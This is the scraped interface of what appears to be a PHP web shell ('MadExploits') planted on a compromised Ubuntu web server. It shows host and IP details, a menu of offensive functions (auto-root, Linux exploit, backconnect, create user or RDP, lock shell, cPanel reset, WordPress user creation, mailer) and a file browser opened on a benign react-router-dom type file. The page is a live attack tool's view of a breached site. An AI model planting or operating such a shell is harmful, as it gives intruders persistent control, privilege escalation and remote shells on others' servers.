Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
react-router-dom /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
CHANGELOG.md
41.59
KB
-rw-r--r--
LICENSE.md
1.13
KB
-rw-r--r--
README.md
302
B
-rw-r--r--
package.json
1.01
KB
-rw-r--r--
server.d.ts
1.62
KB
-rw-r--r--
server.js
10.38
KB
-rw-r--r--
server.mjs
9.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server.d.ts
import * as React from "react"; import type { Router as RemixRouter, StaticHandlerContext, CreateStaticHandlerOptions as RouterCreateStaticHandlerOptions, FutureConfig as RouterFutureConfig } from "@remix-run/router"; import type { FutureConfig, Location, RouteObject } from "react-router-dom"; export interface StaticRouterProps { basename?: string; children?: React.ReactNode; location: Partial<Location> | string; future?: Partial<FutureConfig>; } /** * A `<Router>` that may not navigate to any other location. This is useful * on the server where there is no stateful UI. */ export declare function StaticRouter({ basename, children, location: locationProp, future, }: StaticRouterProps): React.JSX.Element; export { StaticHandlerContext }; export interface StaticRouterProviderProps { context: StaticHandlerContext; router: RemixRouter; hydrate?: boolean; nonce?: string; } /** * A Data Router that may not navigate to any other location. This is useful * on the server where there is no stateful UI. */ export declare function StaticRouterProvider({ context, router, hydrate, nonce, }: StaticRouterProviderProps): React.JSX.Element; type CreateStaticHandlerOptions = Omit<RouterCreateStaticHandlerOptions, "detectErrorBoundary" | "mapRouteProperties">; export declare function createStaticHandler(routes: RouteObject[], opts?: CreateStaticHandlerOptions): import("@remix-run/router").StaticHandler; export declare function createStaticRouter(routes: RouteObject[], context: StaticHandlerContext, opts?: { future?: Partial<Pick<RouterFutureConfig, "v7_partialHydration" | "v7_relativeSplatPath">>; }): RemixRouter;
Close